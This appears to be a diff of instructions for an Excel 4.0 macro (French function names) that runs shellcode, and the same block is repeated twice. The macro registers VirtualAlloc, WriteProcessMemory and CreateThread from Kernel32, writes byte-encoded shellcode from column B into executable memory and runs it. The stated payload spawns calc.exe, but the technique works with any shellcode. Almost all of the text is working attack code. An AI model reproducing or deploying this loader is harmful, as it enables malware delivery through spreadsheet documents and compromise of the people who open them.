FlatL1neAPT · May 28, 2019 17:46
diff --git a/shellcode.xlsm b/shellcode.xlsm
 Once Excel is opened, click on the active tab, select "Insert" then "Macro MS Excel 4.0".

 ================================================================================
 Paste this in cells in column A, starting in cell A1:
 ================================================================================

 =REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9)
 =REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9)
 =REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9)
 =VAlloc(0;4096;4096;64)
 =SELECTIONNER(B1:B50;B1)
 =POSER.VALEUR(C1;0)
 =TANT.QUE(CELLULE.ACTIVE()<>"END")
 =POSER.VALEUR(C2;NBCAR(CELLULE.ACTIVE()))
 =WProcessMemory(-1; A4 + (C1 * 20); CELLULE.ACTIVE();NBCAR(CELLULE.ACTIVE()); 0)
 =POSER.VALEUR(C1; C1 +1)
 =SELECTIONNER(;"L(1)C")
 =SUIVANT()
 =CThread(0;0;A4;0;0;0)
 =ARRETER()

 ================================================================================
 Paste the following shellcode payload in column B, starting in cell B1 (spawns calc.exe):
 ================================================================================

 =CAR(218)&CAR(209)&CAR(217)&CAR(116)&CAR(36)&CAR(244)&CAR(189)&CAR(104)&CAR(130)&CAR(15)&CAR(220)&CAR(94)&CAR(41)&CAR(201)&CAR(177)&CAR(49)&CAR(131)&CAR(238)&CAR(252)&CAR(49)
 =CAR(110)&CAR(20)&CAR(3)&CAR(110)&CAR(124)&CAR(96)&CAR(250)&CAR(32)&CAR(148)&CAR(230)&CAR(5)&CAR(217)&CAR(100)&CAR(135)&CAR(140)&CAR(60)&CAR(85)&CAR(135)&CAR(235)&CAR(53)
 =CAR(197)&CAR(55)&CAR(127)&CAR(27)&CAR(233)&CAR(188)&CAR(45)&CAR(136)&CAR(122)&CAR(176)&CAR(249)&CAR(191)&CAR(203)&CAR(127)&CAR(220)&CAR(142)&CAR(204)&CAR(44)&CAR(28)&CAR(144)
 =CAR(78)&CAR(47)&CAR(113)&CAR(114)&CAR(111)&CAR(224)&CAR(132)&CAR(115)&CAR(168)&CAR(29)&CAR(100)&CAR(33)&CAR(97)&CAR(105)&CAR(219)&CAR(214)&CAR(6)&CAR(39)&CAR(224)&CAR(93)
 =CAR(84)&CAR(169)&CAR(96)&CAR(129)&CAR(44)&CAR(200)&CAR(65)&CAR(20)&CAR(39)&CAR(147)&CAR(65)&CAR(150)&CAR(228)&CAR(175)&CAR(203)&CAR(128)&CAR(233)&CAR(138)&CAR(130)&CAR(59)
 =CAR(217)&CAR(97)&CAR(21)&CAR(234)&CAR(16)&CAR(137)&CAR(186)&CAR(211)&CAR(157)&CAR(120)&CAR(194)&CAR(20)&CAR(25)&CAR(99)&CAR(177)&CAR(108)&CAR(90)&CAR(30)&CAR(194)&CAR(170)
 =CAR(33)&CAR(196)&CAR(71)&CAR(41)&CAR(129)&CAR(143)&CAR(240)&CAR(149)&CAR(48)&CAR(67)&CAR(102)&CAR(93)&CAR(62)&CAR(40)&CAR(236)&CAR(57)&CAR(34)&CAR(175)&CAR(33)&CAR(50)
 =CAR(94)&CAR(36)&CAR(196)&CAR(149)&CAR(215)&CAR(126)&CAR(227)&CAR(49)&CAR(188)&CAR(37)&CAR(138)&CAR(96)&CAR(24)&CAR(139)&CAR(179)&CAR(115)&CAR(195)&CAR(116)&CAR(22)&CAR(255)
 =CAR(233)&CAR(97)&CAR(43)&CAR(162)&CAR(103)&CAR(119)&CAR(185)&CAR(216)&CAR(197)&CAR(119)&CAR(193)&CAR(226)&CAR(121)&CAR(16)&CAR(240)&CAR(105)&CAR(22)&CAR(103)&CAR(13)&CAR(184)
 =CAR(83)&CAR(151)&CAR(71)&CAR(225)&CAR(245)&CAR(48)&CAR(14)&CAR(115)&CAR(68)&CAR(93)&CAR(177)&CAR(169)&CAR(138)&CAR(88)&CAR(50)&CAR(88)&CAR(114)&CAR(159)&CAR(42)&CAR(41)
 =CAR(119)&CAR(219)&CAR(236)&CAR(193)&CAR(5)&CAR(116)&CAR(153)&CAR(229)&CAR(186)&CAR(117)&CAR(136)&CAR(133)&CAR(93)&CAR(230)&CAR(80)&CAR(100)&CAR(248)&CAR(142)&CAR(243)&CAR(120)
 END
	Once Excel is opened, click on the active tab, select "Insert" then "Macro MS Excel 4.0".

	================================================================================
	Paste this in cells in column A, starting in cell A1:
	================================================================================

	=REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9)
	=REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9)
	=REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9)
	=VAlloc(0;4096;4096;64)
	=SELECTIONNER(B1:B50;B1)
	=POSER.VALEUR(C1;0)
	=TANT.QUE(CELLULE.ACTIVE()<>"END")
	=POSER.VALEUR(C2;NBCAR(CELLULE.ACTIVE()))
	=WProcessMemory(-1; A4 + (C1 * 20); CELLULE.ACTIVE();NBCAR(CELLULE.ACTIVE()); 0)
	=POSER.VALEUR(C1; C1 +1)
	=SELECTIONNER(;"L(1)C")
	=SUIVANT()
	=CThread(0;0;A4;0;0;0)
	=ARRETER()

	================================================================================
	Paste the following shellcode payload in column B, starting in cell B1 (spawns calc.exe):
	================================================================================

	=CAR(218)&CAR(209)&CAR(217)&CAR(116)&CAR(36)&CAR(244)&CAR(189)&CAR(104)&CAR(130)&CAR(15)&CAR(220)&CAR(94)&CAR(41)&CAR(201)&CAR(177)&CAR(49)&CAR(131)&CAR(238)&CAR(252)&CAR(49)
	=CAR(110)&CAR(20)&CAR(3)&CAR(110)&CAR(124)&CAR(96)&CAR(250)&CAR(32)&CAR(148)&CAR(230)&CAR(5)&CAR(217)&CAR(100)&CAR(135)&CAR(140)&CAR(60)&CAR(85)&CAR(135)&CAR(235)&CAR(53)
	=CAR(197)&CAR(55)&CAR(127)&CAR(27)&CAR(233)&CAR(188)&CAR(45)&CAR(136)&CAR(122)&CAR(176)&CAR(249)&CAR(191)&CAR(203)&CAR(127)&CAR(220)&CAR(142)&CAR(204)&CAR(44)&CAR(28)&CAR(144)
	=CAR(78)&CAR(47)&CAR(113)&CAR(114)&CAR(111)&CAR(224)&CAR(132)&CAR(115)&CAR(168)&CAR(29)&CAR(100)&CAR(33)&CAR(97)&CAR(105)&CAR(219)&CAR(214)&CAR(6)&CAR(39)&CAR(224)&CAR(93)
	=CAR(84)&CAR(169)&CAR(96)&CAR(129)&CAR(44)&CAR(200)&CAR(65)&CAR(20)&CAR(39)&CAR(147)&CAR(65)&CAR(150)&CAR(228)&CAR(175)&CAR(203)&CAR(128)&CAR(233)&CAR(138)&CAR(130)&CAR(59)
	=CAR(217)&CAR(97)&CAR(21)&CAR(234)&CAR(16)&CAR(137)&CAR(186)&CAR(211)&CAR(157)&CAR(120)&CAR(194)&CAR(20)&CAR(25)&CAR(99)&CAR(177)&CAR(108)&CAR(90)&CAR(30)&CAR(194)&CAR(170)
	=CAR(33)&CAR(196)&CAR(71)&CAR(41)&CAR(129)&CAR(143)&CAR(240)&CAR(149)&CAR(48)&CAR(67)&CAR(102)&CAR(93)&CAR(62)&CAR(40)&CAR(236)&CAR(57)&CAR(34)&CAR(175)&CAR(33)&CAR(50)
	=CAR(94)&CAR(36)&CAR(196)&CAR(149)&CAR(215)&CAR(126)&CAR(227)&CAR(49)&CAR(188)&CAR(37)&CAR(138)&CAR(96)&CAR(24)&CAR(139)&CAR(179)&CAR(115)&CAR(195)&CAR(116)&CAR(22)&CAR(255)
	=CAR(233)&CAR(97)&CAR(43)&CAR(162)&CAR(103)&CAR(119)&CAR(185)&CAR(216)&CAR(197)&CAR(119)&CAR(193)&CAR(226)&CAR(121)&CAR(16)&CAR(240)&CAR(105)&CAR(22)&CAR(103)&CAR(13)&CAR(184)
	=CAR(83)&CAR(151)&CAR(71)&CAR(225)&CAR(245)&CAR(48)&CAR(14)&CAR(115)&CAR(68)&CAR(93)&CAR(177)&CAR(169)&CAR(138)&CAR(88)&CAR(50)&CAR(88)&CAR(114)&CAR(159)&CAR(42)&CAR(41)
	=CAR(119)&CAR(219)&CAR(236)&CAR(193)&CAR(5)&CAR(116)&CAR(153)&CAR(229)&CAR(186)&CAR(117)&CAR(136)&CAR(133)&CAR(93)&CAR(230)&CAR(80)&CAR(100)&CAR(248)&CAR(142)&CAR(243)&CAR(120)
	END